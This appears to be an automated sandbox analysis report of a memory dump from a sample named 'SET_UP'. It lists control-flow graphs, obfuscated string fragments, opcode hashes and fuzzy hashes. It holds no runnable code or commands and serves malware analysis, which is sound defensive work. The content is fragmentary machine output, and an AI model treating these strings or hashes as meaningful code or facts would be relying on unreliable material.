                                                                                                  • API ID:
                                                                                                  • String ID: 9$AAEK$Z\TD$e*5p$hnt3$lc$up`x$x|~e$zdxe${}iC
                                                                                                  • API String ID: 0-759793530
                                                                                                  • Opcode ID: cb13b8974df6869f289ae0a457d5da0007fd8798e881765fde2594904bb889c9
                                                                                                  • Instruction ID: 4301636a97efe3617d568e95992f9abf73193159bcf6b018cc761b7ad35a0478
                                                                                                  • Opcode Fuzzy Hash: cb13b8974df6869f289ae0a457d5da0007fd8798e881765fde2594904bb889c9
                                                                                                  • Instruction Fuzzy Hash: 02C1C27150C3A18BD322CF2A856035BFFE0AF97701F18895DE8D54B282D779890ACB97

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 1233 971b4f-971b5a 1234 971bac-971be3 1233->1234 1235 971b5c-971ba8 1233->1235 1236 971be6-971bf0 1234->1236 1235->1234 1236->1236 1237 971bf2 1236->1237 1238 971bf4-971bf7 1237->1238 1239 971bf9-971c36 1238->1239 1240 971c38-971cb5 call 966786 1238->1240 1239->1238 1243 971cba-971cc4 1240->1243 1243->1243 1244 971cc6 1243->1244 1245 971cc8-971ccb 1244->1245 1246 971cfe-971da3 call 966786 1245->1246 1247 971ccd-971cfc 1245->1247 1250 971da5-971da8 1246->1250 1247->1245 1251 971df0-971e83 call 966786 1250->1251 1252 971daa-971dee 1250->1252 1255 971e88-971e92 1251->1255 1252->1250 1255->1255 1256 971e94 1255->1256 1257 971e96-971e99 1256->1257 1258 971ec6-971f8e call 966786 1257->1258 1259 971e9b-971ec4 1257->1259 1262 971f93-971f9d 1258->1262 1259->1257 1262->1262 1263 971f9f 1262->1263 1264 971fa1-971fa4 1263->1264 1265 971fa6-971ff9 1264->1265 1266 971ffb-97202a call 966786 1264->1266 1265->1264
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: A$I$M$O$S$c$p${${$|
                                                                                                  • API String ID: 0-348498607
                                                                                                  • Opcode ID: b08a2b5b93a794a8c505335190856fff263884b131eaa54648fe97f0391aa272
                                                                                                  • Instruction ID: f62dae6a8a3a451b440391e3034ed988501d8648d3e1f398cb6432b259bc5efb
                                                                                                  • Opcode Fuzzy Hash: b08a2b5b93a794a8c505335190856fff263884b131eaa54648fe97f0391aa272
                                                                                                  • Instruction Fuzzy Hash: EB024821508BC28ED7268A3C8848756BF916B67228F1CC7DDE4F94F7D3C266D506C7A2

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 1269 98e876-98e89d 1270 98e8a6-98e8c4 1269->1270 1270->1270 1271 98e8c6-98e8e7 1270->1271 1272 98e8f6-98e92e 1271->1272 1272->1272 1273 98e930-98e995 1272->1273 1274 98e996-98e9f3 1273->1274 1274->1274 1275 98e9f5-98ea1a 1274->1275 1277 98ea20-98ea2f 1275->1277 1278 98eac3-98eae9 1275->1278 1279 98ea36-98ea4a 1277->1279 1280 98eaf6-98eb33 1278->1280 1279->1279 1281 98ea4c-98ea7c 1279->1281 1280->1280 1282 98eb35-98eba5 1280->1282 1283 98ea86-98eab4 1281->1283 1284 98eba6-98ebce 1282->1284 1283->1283 1285 98eab6-98eabb 1283->1285 1284->1284 1286 98ebd0-98ec35 1284->1286 1285->1278 1287 98ec36-98ec8c 1286->1287 1287->1287 1288 98ec8e-98ece0 1287->1288 1290 98f246-98f279 call 995456 1288->1290 1291 98ece6-98ed3a 1288->1291 1298 98f27b-98f27f 1290->1298 1299 98f283-98f285 1290->1299 1292 98ed46-98ed78 1291->1292 1292->1292 1294 98ed7a-98eda5 1292->1294 1304 98edab-98edc5 1294->1304 1305 98f235-98f242 1294->1305 1298->1299 1300 98f2a3-98f2ae 1299->1300 1302 98f2ba-98f2e5 1300->1302 1303 98f2b0-98f2b7 1300->1303 1306 98f2e6-98f333 1302->1306 1303->1302 1311 98f22b-98f231 1304->1311 1312 98edcb-98edfb 1304->1312 1305->1290 1306->1306 1307 98f335-98f38a 1306->1307 1310 98f396-98f3b5 1307->1310 1310->1310 1313 98f3b7-98f3dc call 96f2f6 1310->1313 1311->1305 1314 98ee06-98ee24 1312->1314 1318 98f3e6-98f3ee 1313->1318 1314->1314 1316 98ee26-98eea5 1314->1316 1320 98eea6-98eeba 1316->1320 1318->1318 1321 98f3f0-98f3f2 1318->1321 1320->1320 1324 98eebc-98eede 1320->1324 1322 98f3f8-98f408 call 959ae6 1321->1322 1323 98f296-98f29d 1321->1323 1322->1323 1323->1300 1326 98f40d-98f414 1323->1326 1330 98f218-98f227 1324->1330 1331 98eee4-98ef0a 1324->1331 1330->1311 1334 98f20a-98f214 1331->1334 1335 98ef10-98ef13 1331->1335 1334->1330 1335->1334 1337 98ef19-98ef1e 1335->1337 1337->1334 1339 98ef24-98ef89 1337->1339 1341 98ef96-98efba 1339->1341 1341->1341 1342 98efbc-98efd0 1341->1342 1344 98f1f9-98f206 1342->1344 1345 98efd6-98efdf 1342->1345 1344->1334 1345->1344 1346 98efe5-98eff2 1345->1346 1347 98f033-98f035 1346->1347 1348 98eff4-98effb 1346->1348 1351 98f037-98f051 call 959a66 1347->1351 1350 98f012-98f016 1348->1350 1352 98f018-98f021 1350->1352 1353 98f006 1350->1353 1359 98f1a8-98f1b9 1351->1359 1360 98f057-98f063 1351->1360 1356 98f028-98f02c 1352->1356 1357 98f023-98f026 1352->1357 1355 98f007-98f010 1353->1355 1355->1350 1355->1351 1356->1355 1361 98f02e-98f031 1356->1361 1357->1355 1363 98f1bb 1359->1363 1364 98f1c0-98f1cf 1359->1364 1360->1359 1362 98f069-98f071 1360->1362 1361->1355 1365 98f076-98f082 1362->1365 1363->1364 1366 98f1d1 1364->1366 1367 98f1d6-98f1f6 call 959a96 call 959a76 1364->1367 1368 98f084-98f089 1365->1368 1369 98f096-98f09c 1365->1369 1366->1367 1367->1344 1371 98f156-98f15a 1368->1371 1372 98f0be-98f0cc 1369->1372 1373 98f09e-98f0a1 1369->1373 1379 98f15c-98f162 1371->1379 1376 98f16e-98f177 1372->1376 1377 98f0d2-98f0d5 1372->1377 1373->1372 1375 98f0a3-98f0b9 1373->1375 1375->1371 1376->1379 1383 98f179-98f17c 1376->1383 1377->1376 1380 98f0db-98f155 1377->1380 1379->1359 1382 98f164-98f166 1379->1382 1380->1371 1382->1365 1386 98f16c 1382->1386 1384 98f17e-98f1a2 1383->1384 1385 98f1a4-98f1a6 1383->1385 1384->1371 1385->1371 1386->1359
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: A%8$!rsp$\L$dvs$dvs$hi$qU%W$rkde$y>
                                                                                                  • API String ID: 0-2349886934
                                                                                                  • Opcode ID: fbd79053ae610f998a2b4878a9a98840cc9de4318e2817f736815401c59e34c8
                                                                                                  • Instruction ID: 73e89a6f3615cba456664c6c699ffb0d8f7d32e30771940ae5c6efc9fe5da1e3
                                                                                                  • Opcode Fuzzy Hash: fbd79053ae610f998a2b4878a9a98840cc9de4318e2817f736815401c59e34c8
                                                                                                  • Instruction Fuzzy Hash: 3162CD766083418FE724DF29C89475BBBE6EFC5310F18892DE5A58B391D778D805CB82

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 1387 98df66-98dfb0 1388 98dfb2-98dfb5 1387->1388 1389 98dfdf-98e020 1388->1389 1390 98dfb7-98dfdd 1388->1390 1391 98e022-98e025 1389->1391 1390->1388 1392 98e04f-98e07f 1391->1392 1393 98e027-98e04d 1391->1393 1394 98e084-98e092 1392->1394 1393->1391 1394->1394 1395 98e094 1394->1395 1396 98e096-98e099 1395->1396 1397 98e09b-98e0d5 1396->1397 1398 98e0d7-98e0e0 1396->1398 1397->1396 1399 98e302-98e304 1398->1399 1400 98e0e6-98e127 1398->1400 1402 98e30a-98e318 1399->1402 1401 98e129-98e12c 1400->1401 1403 98e16b-98e16f 1401->1403 1404 98e12e-98e169 1401->1404 1403->1399 1405 98e175-98e191 1403->1405 1404->1401 1406 98e196-98e1a1 1405->1406 1406->1406 1407 98e1a3 1406->1407 1408 98e1a5-98e1a8 1407->1408 1409 98e1aa-98e1fa 1408->1409 1410 98e1fc-98e200 1408->1410 1409->1408 1410->1399 1411 98e206-98e222 1410->1411 1412 98e227-98e232 1411->1412 1412->1412 1413 98e234 1412->1413 1414 98e236-98e239 1413->1414 1415 98e23b-98e263 1414->1415 1416 98e265-98e269 1414->1416 1415->1414 1416->1399 1417 98e26f-98e297 1416->1417 1418 98e29c-98e2aa 1417->1418 1418->1418 1419 98e2ac 1418->1419 1420 98e2ae-98e2b1 1419->1420 1421 98e2f2-98e2fe 1420->1421 1422 98e2b3-98e2f0 1420->1422 1421->1399 1423 98e300-98e308 1421->1423 1422->1420 1423->1402
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: )$*$+$/$7$?$S$e$~
                                                                                                  • API String ID: 0-3480511049
                                                                                                  • Opcode ID: 4e5a7a7a3344a5766c86a1d0e437b235d97b5be5e203f7649a6937884549a781
                                                                                                  • Instruction ID: 82e9a7da38c359ae04e25bf3be94195f5846f3f762564233ce716f7511db35b6
                                                                                                  • Opcode Fuzzy Hash: 4e5a7a7a3344a5766c86a1d0e437b235d97b5be5e203f7649a6937884549a781
                                                                                                  • Instruction Fuzzy Hash: ADA1916260C7D08AD321963C885835FAED16BE2324F2D8EADE5F4C73D6D679C8058763

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 1425 9636be-9636dc 1426 9636e1-9636ef 1425->1426 1426->1426 1427 9636f1-9636f5 1426->1427 1428 9636f7-9636fa 1427->1428 1429 9636fc-963746 1428->1429 1430 963748-963784 call 953156 1428->1430 1429->1428 1433 963789-963797 1430->1433 1433->1433 1434 963799 1433->1434 1435 96379b-96379e 1434->1435 1436 963805-963837 call 953156 1435->1436 1437 9637a0-963803 1435->1437 1440 96383b-96383f 1436->1440 1441 963839-963871 call 966386 1436->1441 1437->1435 1443 963fa2 1440->1443 1448 963875-9638cd call 959a66 call 95c426 call 966386 1441->1448 1449 963873 1441->1449 1444 96430a 1443->1444 1447 96430c-964321 call 9537e6 1444->1447 1456 960cd5-960d03 call 9537f6 1447->1456 1457 960ccc-964332 1447->1457 1467 9638d1-96395f call 959a66 call 95c426 1448->1467 1468 9638cf 1448->1468 1449->1448 1465 960d08-960d16 1456->1465 1465->1465 1466 960d18-960d1c 1465->1466 1469 960d1e-960d21 1466->1469 1482 963964-963972 1467->1482 1468->1467 1471 960d23-960d8e 1469->1471 1472 960d90-960dfa call 9536e6 1469->1472 1471->1469 1478 960dfe-960e02 1472->1478 1479 960dfc-960e25 1472->1479 1478->1447 1483 960e2a-960e38 1479->1483 1482->1482 1484 963974-963978 1482->1484 1483->1483 1485 960e3a 1483->1485 1486 96397a-96397d 1484->1486 1487 960e3c-960e3f 1485->1487 1488 9639d5-9639e6 1486->1488 1489 96397f-9639d3 1486->1489 1490 960e91-960ee0 call 953256 1487->1490 1491 960e41-960e8f 1487->1491 1492 9639fb-963a14 1488->1492 1493 9639e8-9639f6 call 959a76 1488->1493 1489->1486 1490->1444 1499 960ee6 1490->1499 1491->1487 1496 963a16 1492->1496 1497 963a18-963a6b call 959a66 1492->1497 1504 963fa0 1493->1504 1496->1497 1506 963a91-963ab7 call 959a76 1497->1506 1507 963a6d-963a8c call 959a76 * 2 1497->1507 1499->1444 1504->1443 1515 963abc-963ac7 1506->1515 1520 963f9e 1507->1520 1515->1515 1517 963ac9 1515->1517 1519 963acb-963ace 1517->1519 1521 963b16-963b5c call 953456 1519->1521 1522 963ad0-963b14 1519->1522 1520->1504 1525 963b61-963b6f 1521->1525 1522->1519 1525->1525 1526 963b71-963b73 1525->1526 1527 963b77-963b7a 1526->1527 1528 963b7c-963b97 1527->1528 1529 963b99-963bb9 call 953366 1527->1529 1528->1527 1532 963ea1-963f35 call 95a596 call 970dc6 call 95b146 1529->1532 1533 963bbf-963c6f call 9537e6 1529->1533 1549 963f37-963f48 1532->1549 1550 963f70-963f99 call 959a76 * 2 call 95a676 1532->1550 1538 963c73-963c90 call 959a66 1533->1538 1539 963c71 1533->1539 1545 963cc7-963cc9 1538->1545 1546 963c92-963ca0 1538->1546 1539->1538 1551 963ccb-963ccd 1545->1551 1548 963ca2-963cb3 call 966616 1546->1548 1563 963cb7-963cc5 1548->1563 1564 963cb5 1548->1564 1553 963f64-963f6c call 959a76 1549->1553 1554 963f4a-963f4e 1549->1554 1550->1520 1555 963cde-963d4d call 9537f6 1551->1555 1556 963ccf-963cd9 1551->1556 1553->1550 1559 963f50-963f60 call 9666e6 1554->1559 1574 963d4f-963d52 1555->1574 1556->1532 1573 963f62 1559->1573 1563->1545 1564->1548 1573->1553 1576 963d54-963db1 1574->1576 1577 963db3-963dfa call 953156 1574->1577 1576->1574 1581 963dff-963e0d 1577->1581 1581->1581 1582 963e0f 1581->1582 1583 963e11-963e14 1582->1583 1584 963e16-963e42 1583->1584 1585 963e44-963e9c call 953156 call 966626 1583->1585 1584->1583 1585->1551
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8$:$?$K$P$^$y
                                                                                                  • API String ID: 0-983560543
                                                                                                  • Opcode ID: b67afd4466eafd7e5487065f03ebd70ba924fc1fed9c1de6eeae69b2454bcfa5
                                                                                                  • Instruction ID: d732e251084be0541f5d4475347b506b370efc005969e009cbd7f4b91a00888c
                                                                                                  • Opcode Fuzzy Hash: b67afd4466eafd7e5487065f03ebd70ba924fc1fed9c1de6eeae69b2454bcfa5
                                                                                                  • Instruction Fuzzy Hash: FA328371A0C7808BD7249B38C8953AFBBE1ABD5320F198B2DD4E9873D2D77946048B43
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "'5{$$U3W$*2tn$8McO$=]._$bYz[$hw?>
                                                                                                  • API String ID: 0-1738863435
                                                                                                  • Opcode ID: 691a30d78b65c4a2dcc90a59a2b2e39e55b7b26dfbcc9bd9b5c050343e5b3b82
                                                                                                  • Instruction ID: c3f2b0c46313f6bc1d17693aac008430036ebfa0aac28ecb0ca34d6b1eba1d14
                                                                                                  • Opcode Fuzzy Hash: 691a30d78b65c4a2dcc90a59a2b2e39e55b7b26dfbcc9bd9b5c050343e5b3b82
                                                                                                  • Instruction Fuzzy Hash: 80C19FB120C3808FD725CF2A945176FBBE5AFC2705F188D2CE8D55B381D6798909CB5A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %Daa$-Kvr$HNtL$_`fb$jhoR$q5pu$r
                                                                                                  • API String ID: 0-4144107540
                                                                                                  • Opcode ID: 68fc2aa0e00a9df919a7137d93aeb29144a0ca1f7f2425b66ab06fdc848d2db5
                                                                                                  • Instruction ID: bcbd2b5a60308e00073805d60a0f996726dc4eda331b103d3e5e2abd18b92571
                                                                                                  • Opcode Fuzzy Hash: 68fc2aa0e00a9df919a7137d93aeb29144a0ca1f7f2425b66ab06fdc848d2db5
                                                                                                  • Instruction Fuzzy Hash: A6616833A487628BD330CE25C4413ABB7E5EF95350F0DCA2DC8CD87385E638990A9386
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "#$<=$OM$]?[9$q$MO
                                                                                                  • API String ID: 0-1420632330
                                                                                                  • Opcode ID: 475df92f2b8341af16a667cdbd56811edf1c6f380669b36e67f0c460ea51655d
                                                                                                  • Instruction ID: c8eab2aaf817efec168556b25820b3689c62ce4f51f04dafa9d09557f842b329
                                                                                                  • Opcode Fuzzy Hash: 475df92f2b8341af16a667cdbd56811edf1c6f380669b36e67f0c460ea51655d
                                                                                                  • Instruction Fuzzy Hash: 098198B250D3419BD704CF25C99429FBFE1ABD5318F19891CE0E48B252D739CA0ACB97
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: )$)$IDAT$IEND$IHDR
                                                                                                  • API String ID: 0-3469842109
                                                                                                  • Opcode ID: 25c1f7788b57d1cfafb0456fcc14d1d98dd48e286433eda54b953b01b10a66f2
                                                                                                  • Instruction ID: 02afafb3e672aa6ad5a0d89ad37c13054ab0f43baf17862871cbc2bd9d735e73
                                                                                                  • Opcode Fuzzy Hash: 25c1f7788b57d1cfafb0456fcc14d1d98dd48e286433eda54b953b01b10a66f2
                                                                                                  • Instruction Fuzzy Hash: 160225B16083408FD714DF2AC89176A7BE0EF96301F56892DFD858B392D375D909CB92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !e$+$#,$~xy~$~xy~$o
                                                                                                  • API String ID: 0-3379764592
                                                                                                  • Opcode ID: 48d383e47a56a83be7cfad5bc465ece0e7082685d725cd1ab7322a83efce1313
                                                                                                  • Instruction ID: 0fc329948de78f209e52d7a39bc1e290d2e62dbe5dbc497d365c0aa0d1457657
                                                                                                  • Opcode Fuzzy Hash: 48d383e47a56a83be7cfad5bc465ece0e7082685d725cd1ab7322a83efce1313
                                                                                                  • Instruction Fuzzy Hash: 34C13573A083508BD714CF29C84076FB7E6EBD5314F19CA2DE8894B396E6369C068797
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AF$HQ$N\$PS$^\
                                                                                                  • API String ID: 0-2501979616
                                                                                                  • Opcode ID: 21c64d89443b74d56fd50ab436add40281980b8fd4d37f785b46bd4cbb986242
                                                                                                  • Instruction ID: 9df41e2132b85a59ef536c2f74337eb73f4f0fed6308761b0c83f2d30aab322f
                                                                                                  • Opcode Fuzzy Hash: 21c64d89443b74d56fd50ab436add40281980b8fd4d37f785b46bd4cbb986242
                                                                                                  • Instruction Fuzzy Hash: E4A1DF70204B429FD729CF2AC590762BBF1FF56300F18869CC4968BB86C779E956CB91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: OR}@$QL$UUmX$V\VS$^T^[
                                                                                                  • API String ID: 0-559900424
                                                                                                  • Opcode ID: becbe8a6ed91c5450a6e2af602237c373d5b903eebacead02d6d015daafd0f11
                                                                                                  • Instruction ID: c605f5a36b2ad50b937b3e8e4a83fba022b0693171c77898e83eaec87263872b
                                                                                                  • Opcode Fuzzy Hash: becbe8a6ed91c5450a6e2af602237c373d5b903eebacead02d6d015daafd0f11
                                                                                                  • Instruction Fuzzy Hash: A261C1F29083418FD720CF28C44575ABBE6BFC2300F198A2DE5D98B392D735E9068B56
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !./$9&'$$L$e"#
                                                                                                  • API String ID: 0-2544096670
                                                                                                  • Opcode ID: 5172483afaefa8bf40c54fd250e29a9ae1cb707a09776222e56ae80d334dde7f
                                                                                                  • Instruction ID: f3b9f9831e673c60c4d0057fde8db9c5ec7c9bb0dafa48f959f67a626ecba5ea
                                                                                                  • Opcode Fuzzy Hash: 5172483afaefa8bf40c54fd250e29a9ae1cb707a09776222e56ae80d334dde7f
                                                                                                  • Instruction Fuzzy Hash: CFE1A0B26083408BD714DF64C891B6BBBE5FFC5314F14892CE9898B391E3B5D909CB56
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: S"(w$S"(w$f
                                                                                                  • API String ID: 0-891790955
                                                                                                  • Opcode ID: 66a512728bf839f5096b55552a896cfd457db638cbc6a3532d41e2a6fdf6310f
                                                                                                  • Instruction ID: beacbdd9e5764f4947c0aa357404d742eb205ccd9ef577b34b8b4742660ec064
                                                                                                  • Opcode Fuzzy Hash: 66a512728bf839f5096b55552a896cfd457db638cbc6a3532d41e2a6fdf6310f
                                                                                                  • Instruction Fuzzy Hash: 7812BF71609341AFDB24CF19C890B2BBBE5FFC9324F148A2CE5A5573A1D331A945CB92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: iimc${x$N
                                                                                                  • API String ID: 0-4274742976
                                                                                                  • Opcode ID: 91dca1093e9fa86f64bbd512c7343394a1cba50f8ebed930368aeedc02c07b15
                                                                                                  • Instruction ID: 8452d814a112524626810d5549ac3b434168227b8d2cad2495b50a031560a4df
                                                                                                  • Opcode Fuzzy Hash: 91dca1093e9fa86f64bbd512c7343394a1cba50f8ebed930368aeedc02c07b15
                                                                                                  • Instruction Fuzzy Hash: 9FD133716487408BD314CF65C891BABBBE6EFC2318F184A2CE5D18B391DB79C50ACB46
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$?5 *$iW
                                                                                                  • API String ID: 0-1160662838
                                                                                                  • Opcode ID: 115a527e48236188c9ef483393b7c90c2b2324c148cc366265b8e1c5f1156731
                                                                                                  • Instruction ID: d63cbc4077a0b1a2dd60ed9a82bc9c4a94bce98ea89f1e2d2c509fd0d22e2481
                                                                                                  • Opcode Fuzzy Hash: 115a527e48236188c9ef483393b7c90c2b2324c148cc366265b8e1c5f1156731
                                                                                                  • Instruction Fuzzy Hash: 05C1BA7150C3818BD729CF29C5503ABFFE5AF96314F18895EE4D987382D7B9850ACB42
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$?5 *$iW
                                                                                                  • API String ID: 0-1160662838
                                                                                                  • Opcode ID: 3c87d4536e9910f3469be7bd7dd86f6da01b640365703d8eae48154e8103e9e5
                                                                                                  • Instruction ID: d70f86a12f78dfb22dd5a180a546fe69a97a3541868803da7f568127d58f8e66
                                                                                                  • Opcode Fuzzy Hash: 3c87d4536e9910f3469be7bd7dd86f6da01b640365703d8eae48154e8103e9e5
                                                                                                  • Instruction Fuzzy Hash: A9A1AA7050C3818FD729CF29D5613ABBFE5AF96314F18896DE0D987382D779850ACB12
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$?5 *$iW
                                                                                                  • API String ID: 0-1160662838
                                                                                                  • Opcode ID: 378a7e415147d4b54ff434d42162f355a2995293cb2c020527ad4150aa8c1654
                                                                                                  • Instruction ID: 8a9836e230e3b1c21e3bde914f854dea43fe8f62c10774e9a3f0ea717c798bff
                                                                                                  • Opcode Fuzzy Hash: 378a7e415147d4b54ff434d42162f355a2995293cb2c020527ad4150aa8c1654
                                                                                                  • Instruction Fuzzy Hash: 19A1997050D3818FD729CF29D5603ABBFE5AF96314F18896DE0D987382D7B9850ACB12
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ,5#?$D#;"$i,!*
                                                                                                  • API String ID: 0-3194809249
                                                                                                  • Opcode ID: 710dc400cffeecc2fba5093cef42e800e2d6b0f4a3551553b2a94cd71adb34ef
                                                                                                  • Instruction ID: 46998fd7d36286f1a60af0c860b65a52657e7df43bb686e33722fd9945407dff
                                                                                                  • Opcode Fuzzy Hash: 710dc400cffeecc2fba5093cef42e800e2d6b0f4a3551553b2a94cd71adb34ef
                                                                                                  • Instruction Fuzzy Hash: ED513A3794C3558BD720CB25C8802AEB7D2DFD5350F4AC668D8980B3A6F63A9D09D787
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 11?8$1::7$E2=?
                                                                                                  • API String ID: 0-3572394930
                                                                                                  • Opcode ID: 32e7f175b03d03b60b0da4b6708967caa40f49f378d4010b367b44b34d07f423
                                                                                                  • Instruction ID: 91724d5ff57e181cf8992965d35ddb909765b16c1e04797fcac0822f25e7d6be
                                                                                                  • Opcode Fuzzy Hash: 32e7f175b03d03b60b0da4b6708967caa40f49f378d4010b367b44b34d07f423
                                                                                                  • Instruction Fuzzy Hash: 4E31A1B55483D09BE3359B14CC91BFBBBE0AFD2705F184A6CE8D91B391D27509048B57
                                                                                                  Strings
